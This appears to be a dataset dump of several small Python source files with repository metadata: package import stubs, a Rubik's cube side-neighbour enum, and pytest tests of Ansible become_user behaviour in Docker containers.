|
2022-03-20T15:28:14.000Z
|
rest-api/flask_app/auth/__init__.py
|
sinedie/Utimate-flask-websocket-template
|
76daeec2c76f9f27ca526f53393ab4363020b92b
|
[
"WTFPL"
] | null | null | null |
rest-api/flask_app/auth/__init__.py
|
sinedie/Utimate-flask-websocket-template
|
76daeec2c76f9f27ca526f53393ab4363020b92b
|
[
"WTFPL"
] | null | null | null |
from flask_app.auth.jwt import *
from flask_app.auth.login import *
| 22.666667
| 34
| 0.794118
| 12
| 68
| 4.333333
| 0.583333
| 0.346154
| 0.461538
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 3
| 34
| 22.666667
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7948c614a0f5cd66fc523acd84e6f564a708d470
| 411
|
py
|
Python
|
pygfa/graph_element/parser/__init__.py
|
Francesco2304/pygfa
|
9bf6fb5f0a959685300ab863a0e716a2268109f7
|
[
"MIT"
] | 3
|
2020-06-25T22:47:02.000Z
|
2022-02-27T15:16:02.000Z
|
pygfa/graph_element/parser/__init__.py
|
Francesco2304/pygfa
|
9bf6fb5f0a959685300ab863a0e716a2268109f7
|
[
"MIT"
] | 3
|
2017-08-08T12:24:23.000Z
|
2022-02-27T15:17:25.000Z
|
pygfa/graph_element/parser/__init__.py
|
Francesco2304/pygfa
|
9bf6fb5f0a959685300ab863a0e716a2268109f7
|
[
"MIT"
] | 4
|
2019-02-04T20:54:53.000Z
|
2020-05-14T19:52:24.000Z
|
from pygfa.graph_element.parser import header
from pygfa.graph_element.parser import segment
from pygfa.graph_element.parser import link
from pygfa.graph_element.parser import containment
from pygfa.graph_element.parser import path
from pygfa.graph_element.parser import edge
from pygfa.graph_element.parser import fragment
from pygfa.graph_element.parser import gap
from pygfa.graph_element.parser import group
| 45.666667
| 50
| 0.871046
| 63
| 411
| 5.539683
| 0.238095
| 0.232092
| 0.361032
| 0.541547
| 0.851003
| 0.851003
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085158
| 411
| 9
| 51
| 45.666667
| 0.928191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
79a7dee96667cb45658e23c6fa37d52f73ee4b63
| 156
|
py
|
Python
|
src/PYOPATRA/__init__.py
|
georgiastuart/PythonLPT
|
0be9225f9c2d4a85b70e22dcccb5c0bc6152a739
|
[
"MIT"
] | 3
|
2021-08-05T13:29:04.000Z
|
2021-11-22T20:42:03.000Z
|
src/PYOPATRA/__init__.py
|
georgiastuart/PythonLPT
|
0be9225f9c2d4a85b70e22dcccb5c0bc6152a739
|
[
"MIT"
] | 1
|
2022-03-21T22:51:39.000Z
|
2022-03-21T22:51:39.000Z
|
src/PYOPATRA/__init__.py
|
UT-CHG/PYOPATRA
|
971aa79bf24f26939a96d79193c6d1ee16f5531d
|
[
"MIT"
] | null | null | null |
from .file_parsing import *
from .mesh_vertex import *
from .mesh import *
from .particle import *
from .solver import *
from .objective_functions import *
| 22.285714
| 34
| 0.769231
| 21
| 156
| 5.571429
| 0.47619
| 0.42735
| 0.239316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 156
| 6
| 35
| 26
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
79af72296f3d94aa28cf531f84bd1fc6979d556b
| 160
|
py
|
Python
|
devops-console/apps/orgs/signals_handler.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 4
|
2019-12-06T06:19:33.000Z
|
2021-12-23T13:05:06.000Z
|
devops-console/apps/orgs/signals_handler.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 8
|
2020-03-15T03:40:38.000Z
|
2022-03-12T00:50:27.000Z
|
devops-console/apps/orgs/signals_handler.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
from django.db.models.signals import m2m_changed
from django.db.models.signals import post_save
from django.dispatch import receiver
| 22.857143
| 48
| 0.775
| 24
| 160
| 5.083333
| 0.625
| 0.245902
| 0.196721
| 0.295082
| 0.508197
| 0.508197
| 0
| 0
| 0
| 0
| 0
| 0.014184
| 0.11875
| 160
| 6
| 49
| 26.666667
| 0.851064
| 0.13125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8dce0b2a1aab3f68225647a986d5c6917b20a924
| 3,336
|
py
|
Python
|
MCState/MCubeSide.py
|
MagicCubeProject/MagicCubeLib
|
4d66f42bb0804837d048a14d7fe4216683c57c71
|
[
"Apache-2.0"
] | null | null | null |
MCState/MCubeSide.py
|
MagicCubeProject/MagicCubeLib
|
4d66f42bb0804837d048a14d7fe4216683c57c71
|
[
"Apache-2.0"
] | 1
|
2018-03-25T17:11:15.000Z
|
2018-03-25T17:11:15.000Z
|
MCState/MCubeSide.py
|
Narekmouse/gtpy
|
4d66f42bb0804837d048a14d7fe4216683c57c71
|
[
"Apache-2.0"
] | null | null | null |
from enum import Enum, auto
from MCState.MCSide.MCElementDirection import MCubeDirection
class MCubeSide(Enum):
FRONT = auto()
RIGHT = auto()
DOWN = auto()
UP = auto()
LEFT = auto()
BACK = auto()
def __str__(self):
return str(self.name)
def neighbor(self,direction):
"""
neighbor is side which have mutual elements
:param direction:
:return: neghbors
"""
if self is MCubeSide.FRONT:
if direction is MCubeDirection.NORTH:
return MCubeSide.UP
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.RIGHT:
if direction is MCubeDirection.NORTH:
return MCubeSide.UP
elif direction is MCubeDirection.EAST:
return MCubeSide.BACK
elif direction is MCubeDirection.SOUTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.WEST:
return MCubeSide.FRONT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.BACK:
if direction is MCubeDirection.NORTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.UP
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.LEFT:
if direction is MCubeDirection.NORTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.EAST:
return MCubeSide.BACK
elif direction is MCubeDirection.SOUTH:
return MCubeSide.UP
elif direction is MCubeDirection.WEST:
return MCubeSide.FRONT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.UP:
if direction is MCubeDirection.NORTH:
return MCubeSide.BACK
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.FRONT
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.DOWN:
if direction is MCubeDirection.NORTH:
return MCubeSide.FRONT
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.BACK
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
| 37.483146
| 68
| 0.572842
| 306
| 3,336
| 6.232026
| 0.137255
| 0.138437
| 0.31463
| 0.273728
| 0.842685
| 0.842685
| 0.842685
| 0.783954
| 0.783954
| 0.783954
| 0
| 0
| 0.376199
| 3,336
| 88
| 69
| 37.909091
| 0.916386
| 0.023681
| 0
| 0.769231
| 0
| 0
| 0.037302
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.025641
| 0.012821
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5c04bb25144186551382a4e30f1915d7ed7d1d0a
| 4,330
|
py
|
Python
|
tests/test_ansible_become_method_dockerexec.py
|
goodplay/goodplay
|
dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca
|
[
"Apache-2.0"
] | 16
|
2016-03-16T12:20:49.000Z
|
2020-04-17T15:31:54.000Z
|
tests/test_ansible_become_method_dockerexec.py
|
goodplay/goodplay
|
dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca
|
[
"Apache-2.0"
] | 290
|
2016-02-26T06:49:32.000Z
|
2022-03-18T08:32:25.000Z
|
tests/test_ansible_become_method_dockerexec.py
|
goodplay/goodplay
|
dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca
|
[
"Apache-2.0"
] | 9
|
2016-01-20T20:55:44.000Z
|
2020-11-04T03:51:03.000Z
|
# -*- coding: utf-8 -*-
from goodplay_helpers import skip_if_no_docker, smart_create
@skip_if_no_docker
def test_become_user_on_task_without_become_does_not_execute_as_become_user(testdir):
smart_create(testdir.tmpdir, '''
## docker-compose.yml
version: "2"
services:
host1:
image: centos:centos6
tty: True
## inventory
host1 ansible_user=root
## test_playbook.yml
- hosts: host1
gather_facts: no
tasks:
- name: create system group myservice
group:
name: myservice
system: yes
state: present
- name: create system user myservice
user:
name: myservice
group: myservice
shell: /sbin/nologin
system: yes
state: present
- name: create myservice directory
file:
path: /opt/myservice
owner: myservice
group: myservice
mode: 0700
state: directory
- name: intentionally only specify become_user on this task
file:
path: /opt/myservice/somefile
state: touch
become_user: myservice
- name: ensure somefile is owned by root user which is not the become_user
file:
path: /opt/myservice/somefile
owner: root
group: root
state: file
tags: test
''')
result = testdir.inline_run('-s')
result.assertoutcome(passed=1)
@skip_if_no_docker
def test_become_with_become_user_on_play(testdir):
smart_create(testdir.tmpdir, '''
## docker-compose.yml
version: "2"
services:
host1:
image: centos:centos6
tty: True
## inventory
host1 ansible_user=root
## test_playbook.yml
- hosts: host1
gather_facts: no
become_user: myservice
tasks:
- name: create system group myservice
group:
name: myservice
system: yes
state: present
- name: create system user myservice
user:
name: myservice
group: myservice
shell: /sbin/nologin
system: yes
state: present
- name: create myservice directory
file:
path: /opt/myservice
owner: myservice
group: myservice
mode: 0700
state: directory
- name: make some file operation as myservice user
file:
path: /opt/myservice/somefile
state: touch
become: yes
- name: ensure somefile is owned by myservice user
file:
path: /opt/myservice/somefile
owner: myservice
group: myservice
state: file
tags: test
''')
result = testdir.inline_run('-s')
result.assertoutcome(passed=1)
@skip_if_no_docker
def test_become_with_become_user_on_task(testdir):
smart_create(testdir.tmpdir, '''
## docker-compose.yml
version: "2"
services:
host1:
image: centos:centos6
tty: True
## inventory
host1 ansible_user=root
## test_playbook.yml
- hosts: host1
gather_facts: no
tasks:
- name: create system group myservice
group:
name: myservice
system: yes
state: present
- name: create system user myservice
user:
name: myservice
group: myservice
shell: /sbin/nologin
system: yes
state: present
- name: create myservice directory
file:
path: /opt/myservice
owner: myservice
group: myservice
mode: 0700
state: directory
- name: make some file operation as myservice user
file:
path: /opt/myservice/somefile
state: touch
become: yes
become_user: myservice
- name: ensure somefile is owned by myservice user
file:
path: /opt/myservice/somefile
owner: myservice
group: myservice
state: file
tags: test
''')
result = testdir.inline_run('-s')
result.assertoutcome(passed=1)
| 24.055556
| 85
| 0.551039
| 438
| 4,330
| 5.315068
| 0.19863
| 0.066151
| 0.042526
| 0.07732
| 0.905498
| 0.905498
| 0.905498
| 0.878007
| 0.861684
| 0.833763
| 0
| 0.01158
| 0.381755
| 4,330
| 179
| 86
| 24.189944
| 0.85805
| 0.00485
| 0
| 0.946667
| 0
| 0
| 0.848386
| 0.032041
| 0
| 0
| 0
| 0
| 0.02
| 1
| 0.02
| false
| 0.02
| 0.006667
| 0
| 0.026667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.